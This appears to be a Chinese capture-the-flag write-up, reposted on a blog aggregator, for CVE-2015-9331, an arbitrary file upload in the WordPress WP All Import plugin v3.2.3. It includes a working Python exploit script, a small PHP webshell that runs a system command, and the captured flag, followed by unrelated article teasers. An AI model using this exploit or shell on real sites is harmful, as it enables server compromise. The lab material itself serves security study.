春秋云镜 CVE-2015-9331

news/2024/11/15 21:48:53/文章来源:https://blog.csdn.net/qq_22002773/article/details/132807355

春秋云镜 CVE-2015-9331 wordpress插件 WordPress WP All Import plugin v3.2.3 任意文件上传

靶标介绍

wordpress插件 WordPress WP All Import plugin v3.2.3 存在任意文件上传，可以上传shell。

启动场景

在这里插入图片描述

漏洞利用

exp

#/usr/local/bin/python3
# -*-coding:utf-8-*-import requests,os
site="eci-2ze8y6cz5vszwgd99u5d.cloudeci1.ichunqiu.com"
file_to_upload ='shell.php'
up_req = requests.post('http://'+site+'/wp-admin/admin-ajax.php?page=pmxi-admin-settings&action=upload&name=evil.php',data=open(file_to_upload,'rb').read())
up_dir = os.popen('php -r "print md5(strtotime(\''+up_req.headers['date']+'\'));"').read()
print ("http://"+site+"/wp-content/uploads/wpallimport/uploads/"+up_dir+"/%s" % "evil.php")

site处填域名，file_to_upload处填shell文件名。
shell如下

<?php
system('cat /flag');phpinfo();
?>

执行exp脚本
在这里插入图片描述
访问链接

得到flag

flag{3df8d04f-d7cd-4b22-a2aa-25ca6e8dde62}

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.rhkb.cn/news/130152.html

如若内容造成侵权/违法违规/事实不符，请联系长河编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

IDEA中debug调试模拟时显示不全（不显示null）的解决

IDEA中debug调试模拟时显示不全（不显示null）的解决 1、在IDEA中找到File（文件）->Settings（设置） 2、依次找到以下内容进行设置（原版、汉化版）： 打开Build, Executio…

taro vue3 ts nut-ui 项目

# 使用 npm 安装 CLI $ npm install -g tarojs/cli 查看 Taro 全部版本信息可以使用 npm info 查看 Taro 版本信息，在这里你可以看到当前最新版本 npm info tarojs/cli 项目初始化使用命令创建模板项目： taro init 项目名 taro init myApp …

使用Puppeteer进行游戏数据可视化

导语 Puppeteer是一个基于Node.js的库，可以用来控制Chrome或Chromium浏览器，实现网页操作、截图、测试、爬虫等功能。本文将介绍如何使用Puppeteer进行游戏数据的爬取和可视化，以《英雄联盟》为例。概述《英雄联盟》是一款由Riot Games开…

MySQL之视图

概念视图是一个虚拟表，其内容由查询定义。同真实的表一样，视图包含一系列带有名称的列和行数据。视图的数据变化会影响到基表，基表的数据变化也会影响到视图。基本使用创建视图 create view 视图名 as select语句； 示例&am…

纯小白安卓刷机1

文章目录常见的英文意思刷机是什么？为什么要刷机？什么是BL锁（BootLoader锁）？我的机能够刷机吗？什么是Boot镜像/分区？什么是Recovery镜像/分区（缩写为rec）？什…

iisfastchi漏洞复现

1.查看版本 2.在路径中写入 php脚本发现使用不了 3.环境搭建结局打开把限制打开

C#，数值计算——指数微分（exponential deviates）的计算方法与源程序

1 文本格式 using System; namespace Legalsoft.Truffer { /// <summary> /// 指数偏差 /// Structure for exponential deviates. /// </summary> public class Expondev : Ran { private double beta { get; set; } /// <s…

说完 Java 的 Abstract 后再来说说接口（interface ）

如你对 Abstract 修饰的抽象类不是非常了解的话，请自行先考古下。这篇文章需要对 Java 定义过的抽象类有一些基本的了解才可以。抽象类和抽象方法用 Abstract 修饰的类，叫做抽象类，那么用 Abstract 修饰的方法叫做抽象方法。在 Java 中…

Python从零到一构建项目

随着互联网的发展，网络上的信息量急剧增长，而获取、整理和分析这些信息对于很多人来说是一项艰巨的任务。而Python作为一种功能强大的编程语言，它的爬虫能力使得我们能够自动化地从网页中获取数据，大大提高了效率。本文将分享如何…

SpringMvc--CRUD

目录一.什么是SpringMvc--CRUD 二.前期准备公共页面跳转(专门用来处理页面跳转) 三.ssm之CRUD后端实现配置pom.xml 双击mybatis-generator:generate自动生成mapper 编写generatorConfig.xml 项目结构编写PagerAspect切面类编写hpjyBiz接口类编写hpjyBizImpl接…

《DevOps实践指南》- 读书笔记（二）

DevOps实践指南 Part 2 从何处开始5. 选择合适的价值流作为切入点5.1 绿地项目与棕地项目5.2 兼顾记录型系统和交互型系统5.3 从最乐于创新的团队开始5.4 扩大 DevOps 的范围5.5 小结 6. 理解、可视化和运用价值流6.1 确定创造客户价值所需的团队6.2 针对团队工作绘制价值流图6…

一起学数据结构（6）——栈和队列

上篇文章中，对栈的概念及特点进行了解释，并且给出了栈实现的具体代码。本篇文章将给出队列的基本概念及特点。并给出相应的代码。 1. 队列的概念及结构： 在给出队列的概念之前，先给出上篇文章中提到的栈的概念：一种只…

SMB 协议详解之-NTLM身份认证

前面的文章说明了SMB协议交互的过程，在SMB交互的Session Setup Request/Response会对请求者的身份进行验证，这其中涉及到两个主要的协议NTLM以及Kerberos，本文将对NTLM协议进行详细的说明。什么是NTLM NTLM是 NT LAN Manager (NTLM) Authentication Protocol 的缩写，主要…

$duffing方程matlab绘制$